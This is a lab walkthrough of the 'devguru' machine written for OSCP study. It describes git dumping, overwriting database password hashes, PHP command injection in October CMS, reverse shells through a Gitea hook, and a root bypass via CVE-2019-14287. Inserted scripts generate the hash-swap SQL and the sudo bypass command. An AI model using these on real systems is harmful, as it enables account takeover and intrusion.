OSCP Preparation [ devguru ]

j1gs@w
8 min read · Mar 28, 2023


This is the 4th machine that I have done for my OSCP preparation. I learned some new tools for this one! So, let’s get into it!

Target machine’s IP address

First things first, the target machine is identified as 192.168.181.151 through an nmap host-discovery (ping) scan with the -sn switch, with -oN used to write the results to a file.

Results of port scanning

Using nmap to perform a version scan (-sV), run the default NSE scripts (-sC) and skip host discovery so the host is treated as up (-Pn) reveals a web server and SSH running on the target machine.

The results also show that the default http-git script found an exposed .git repository on the web server, and the script output references the hostname devguru.local.

Index page of the target machine

Going to the web server at port 80, reveals a normal company website.

Results of directory brute-forcing

Directory brute-forcing with ffuf confirms that the .git directory is exposed and that .htaccess is readable.

backend directory

ffuf also discovers a backend directory.

October login page

First, the /backend directory leads to an October CMS login page.

Another directory accessible

Secondly, another path was discovered within .htaccess: /adminer.php.

adminer.php

Adminer (adminer.php) is a single-file PHP database administration tool rather than a DBMS itself: given valid credentials, it provides a web front end to the database server behind the site, including the ability to browse and edit rows.

Adding devguru.local into /etc/hosts

With all the gathered information, the hostname devguru.local is first added to /etc/hosts so that the site can be requested by that name and the git repository fetched from it.

Using gitdumper.sh

At this point I was stuck, but looking at other writeups revealed a new tool for me, GitTools. Within GitTools, gitdumper.sh is a bash script that downloads as much as possible of a web server's exposed .git directory even when directory listing is disabled, by fetching the known metadata files (HEAD, config, refs, index) and then every object they reference.

Using extractor.sh

Also within GitTools is another bash script, extractor.sh, which reconstructs the working tree of each commit from the dumped objects.

Contents of the commit

Within the commit, one directory stands out: config.

database configuration within the config directory

Within the config directory, database.php stands out, since a database administration tool was already discovered.

DBMS credentials

Within database.php, the credentials for the DBMS were found.

Databases available

Entering the credentials found in database.php on Adminer's login page grants access to the database server. A database named octoberdb was found.

backend_users table

Within the backend_users table, a record for the user frank was found with a bcrypt-hashed password.

Cracking the password with JohnTheRipper

At first, I thought the password needed to be cracked so that I could log in to the CMS. However, later I realised that I already had write access to the database, so I could simply replace the hash with one for a password of my choosing. That still requires generating a bcrypt hash for the new password. Keep a copy of the original hash before overwriting it so the account can be restored afterwards.

Generating the bcrypt hash value for the new password

Using password as the new password, its bcrypt hash is generated.

Editing the password for the user frank

Then, within Adminer, the password field of the user frank is replaced with the hash generated above.

Dashboard of October CMS

Using the new password along with frank as the username, gives me access to the CMS.

Exploit found

Knowing that October CMS is in use, I searched for exploits relating to it and found an upload vulnerability.

Proof of concept of upload vulnerability

The proof of concept is to upload a file whose extension is not in the CMS's blockedExtensions list and then load the uploaded file through the URL above.

PHP reverse shell

After preparing a PHP reverse shell and uploading several variants with different extension-bypass methods, none of them executed, so this attack vector might not be viable here.

Attack vector

Looking around the CMS platform, a place to edit PHP code was found: the Code section of the page editor, which holds server-side PHP that runs for that page. It is recognisable as PHP from the associative-array syntax with square brackets.

Exploit

With that said, the function above, which runs the system command passed in the cmd parameter, is added to the PHP section of the index page.

Proof of concept

As a proof of concept that the exploit works, the ls command is used and a listing of the CMS working directory is printed out.

Checking for Python

Then, python3 --version is passed in the cmd parameter to check whether Python can be used for the next step. Doing so reveals that Python 3 is present on the target machine.

Using a Python reverse shell one-liner

With Python installed, a Python one-liner reverse shell from PentestMonkey can be used to gain a shell on the target machine.

Gaining a shell

After starting a listener on the chosen port, the Python one-liner reverse shell is passed in the cmd parameter. From this, I was able to gain a shell on the target machine.

Downloading linpeas.sh

As usual for privilege escalation enumeration, linpeas.sh is downloaded from the attacker's machine and made executable.

A backup file was found

After launching linpeas.sh, a backup file was found within /var/backups.

DBMS credentials found

Printing the file reveals another set of database credentials.

Logging into the DBMS, a database named gitea was found.

Credentials for the user frank

Again, within the user table, the credentials of the user frank were found, and since the database is writable these values can likewise be changed.

Generating the bcrypt hash value for the new password

Again, the bcrypt hash value for the new password password was generated.

Changing the values on the DBMS

With the new hash value, frank's row was updated: the password column set to the new hash, the hash algorithm column set to bcrypt, and the rands and salt fields emptied, which was necessary for the bcrypt login to be accepted.

Logging in with the new password, using the hostname on port 8585, gives access to frank's Gitea account.
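Both password swaps above (the October CMS backend_users row and the Gitea user row) follow the same pattern: generate a bcrypt hash, sanity-check it, back up the original row, then issue one UPDATE. The script below is an added example and not part of the original post. It assumes php or htpasswd is installed on the attacker's machine for hashing, and it assumes the column names login (October) and lower_name, passwd, passwd_hash_algo, salt and rands (Gitea); the Gitea names beyond those the post mentions are taken from Gitea's schema.

```shell
#!/bin/sh
# Added example (not from the original post). Generates the replacement
# bcrypt hash and the UPDATE statements that the post applied by hand in
# Adminer, with a shape check on the hash first.

# Produce a "$2y$" bcrypt hash with whichever local tool is available.
# Both tools emit the $2y$ prefix that PHP's password_verify() expects.
bcrypt_hash() {
    if command -v php >/dev/null 2>&1; then
        php -r 'echo password_hash($argv[1], PASSWORD_BCRYPT);' "$1"
    elif command -v htpasswd >/dev/null 2>&1; then
        htpasswd -bnBC 10 "" "$1" | tr -d ':\n'
    else
        echo "bcrypt_hash: need php or htpasswd" >&2
        return 1
    fi
}

# A bcrypt string is "$2y$" (or $2a$/$2b$), a two-digit cost, then 53
# base64 characters, 60 in total. Refusing anything else avoids writing a
# truncated hash into the table and locking the account out instead of
# opening it.
is_bcrypt() {
    printf '%s\n' "$1" | grep -Eq '^\$2[aby]\$[0-9]{2}\$[./A-Za-z0-9]{53}$'
}

# October CMS: table backend_users, column password, keyed by login.
october_update_sql() {
    is_bcrypt "$2" || return 1
    printf "UPDATE backend_users SET password = '%s' WHERE login = '%s';\n" "$2" "$1"
}

# Gitea: table user. Besides the hash itself, passwd_hash_algo must say
# bcrypt, and salt/rands are cleared, as the post found necessary.
# (Column names assumed from the post and Gitea's schema.)
gitea_update_sql() {
    is_bcrypt "$2" || return 1
    fmt="UPDATE \`user\` SET passwd = '%s', passwd_hash_algo = 'bcrypt', salt = '', rands = '' WHERE lower_name = '%s';\n"
    printf "$fmt" "$2" "$1"
}

# Read the rows first so the original credentials can be put back.
backup_sql() {
    printf "SELECT login, password FROM backend_users WHERE login = '%s';\n" "$1"
    printf "SELECT lower_name, passwd, passwd_hash_algo, salt, rands FROM \`user\` WHERE lower_name = '%s';\n" "$1"
}

# Usage once a hashing tool is present (run the output in Adminer):
#   backup_sql frank
#   H="$(bcrypt_hash password)"
#   october_update_sql frank "$H"
#   gitea_update_sql frank "$H"
```

The hash check is deliberately strict about length; a hash that has lost a trailing character in copy-and-paste still looks plausible in the table but never verifies.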

Git Hooks for the test repository

An entry vector here is Git hooks: scripts that git runs automatically at defined points, such as when a push is received. Gitea lets a suitably privileged user edit a repository's server-side hooks from the web interface, so a new repository is created for this purpose.

According to Atlassian (n.d.), the server-side hooks are as follows:

  • pre-receive runs once when a git push is received, before any refs are updated; a non-zero exit rejects the whole push
  • update runs after pre-receive, once for each ref being pushed
  • post-receive runs after a push has completed successfully, which makes it the natural place for a command that should fire on every push

A bash reverse shell one-liner

Using the post-receive hook, the bash reverse shell above is saved into the repository's hook settings.

Cloning the test repository

For the reverse shell to work, the repository needed to be cloned.

Configuring git and pushing onto the repository

After configuring git's user.name and user.email and adding a file to the working copy, the change is committed and pushed to the repository, which triggers the hook on the server.

Received a second shell

In the background, a listener on port 9999 received a connection from the target machine.

user flag was found

Within the home directory of the user frank, the user flag was found.

Using sudo -l

Using sudo -l to list the commands the user may run through sudo reveals that frank is allowed to run sqlite3.

Command to gain root with sqlite3

Using GTFOBins, the command above shows how to gain root through sqlite3. However, it does not work here.

Checking sudo version

sudo -V shows the target's sudo version. This matters because of how the sudo -l rule is written: sqlite3 may be run as any user except root, a runas specification of the form (ALL, !root), so the GTFOBins command, which runs as root by default, is refused.

Exploit for bypassing sudo rules

However, searching for exploits against that sudo version reveals that the rule can be bypassed with the command above (Paramasivam, 2019; CVE-2019-14287). sudo 1.8.27 and earlier accept -u#-1 (or -u#4294967295) as the target user: the !root check does not treat that value as root, but the kernel treats a UID of -1 as "leave unchanged", and since sudo is already running as UID 0 the command ends up executing as root.

Gained root privileges

Using that command, with /bin/bash replaced by the GTFOBins sqlite3 invocation, i.e. sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh', gives me root privileges.
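The two conditions above (a sudo older than 1.8.28, and a rule whose runas list excludes root) are easy to check by hand once, and worth automating because the same pattern comes up on other machines. The script below is an added example, not part of the original post: it parses constructed sudo -l and sudo -V output shaped like what the post describes (not captured from the machine), decides whether the bypass applies, and assembles the command, combining it with the GTFOBins sqlite3 primitive when that is the permitted binary.

```shell
#!/bin/sh
# Added example (not from the original post): decide from `sudo -l` and
# `sudo -V` output whether the CVE-2019-14287 trick applies, and assemble
# the command. The samples are constructed, not captured from the machine.

SAMPLE_SUDO_L='User frank may run the following commands on devguru:
    (ALL, !root) NOPASSWD: /usr/bin/sqlite3'
SAMPLE_SUDO_V='Sudo version 1.8.27'

# 0 when the version is older than 1.8.28, the release that fixed the bug.
# Accepts either "1.8.27" or the raw first line of `sudo -V`.
sudo_version_vulnerable() {
    ver="${1#Sudo version }"
    IFS=. read -r major minor patch <<EOF
$ver
EOF
    patch="${patch%%[!0-9]*}"          # "21p2" -> "21"
    major="${major:-0}"; minor="${minor:-0}"; patch="${patch:-0}"
    if [ "$major" -ne 1 ]; then
        [ "$major" -lt 1 ] && return 0
        return 1
    fi
    if [ "$minor" -ne 8 ]; then
        [ "$minor" -lt 8 ] && return 0
        return 1
    fi
    [ "$patch" -lt 28 ] && return 0
    return 1
}

# Print the command part of every rule whose runas list excludes root,
# e.g. "(ALL, !root) NOPASSWD: /usr/bin/sqlite3" -> "/usr/bin/sqlite3".
# Those are the rules the bypass targets: any user is allowed except root,
# and -u#-1 names a "user" that the !root check does not recognise as root.
not_root_rules() {
    grep -E '^[[:space:]]*\([^)]*![[:space:]]*root[^)]*\)' \
    | sed -E 's/^[[:space:]]*\([^)]*\)[[:space:]]*((NOPASSWD|PASSWD|SETENV|NOSETENV):[[:space:]]*)*//'
}

# Combine the bypass with the GTFOBins sqlite3 primitive when that is the
# permitted binary; anything else is run directly.
bypass_command() {
    case "$1" in
        */sqlite3|sqlite3) printf "sudo -u#-1 %s /dev/null '.shell /bin/sh'\n" "$1" ;;
        *) printf 'sudo -u#-1 %s\n' "$1" ;;
    esac
}

# Put it together: one candidate command per matching rule, or a non-zero
# exit when the installed sudo is already fixed.
check_sudo() {
    sudo_version_vulnerable "$2" || return 1
    printf '%s\n' "$1" | not_root_rules | while IFS= read -r cmd; do
        bypass_command "$cmd"
    done
}

# On the target this would be:  check_sudo "$(sudo -l)" "$(sudo -V)"
check_sudo "$SAMPLE_SUDO_L" "$SAMPLE_SUDO_V"
```

A rule written as plain (ALL) or (root) is not reported, which is the correct outcome: in those cases the ordinary GTFOBins command already runs as root and the version check is irrelevant.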

Root flag was found

Going to the home directory of the root user, the root flag was found.

In conclusion, this challenge taught me a new tool and served as a reminder to look for more entry points when a first attempt to gain a shell fails. There were also parts I disregarded because I would not usually expect useful information in them, such as the backup file. So, in summary, this challenge taught me to CHECK EVERYTHING.

References

Atlassian. (n.d.). Git hooks. Atlassian Git Tutorial. Retrieved March 29, 2023, from https://www.atlassian.com/git/tutorials/git-hooks

Paramasivam, M. (2019, October 15). Sudo 1.8.27 - Security bypass (EDB-ID 47502). Exploit Database. Retrieved March 29, 2023, from https://www.exploit-db.com/exploits/47502

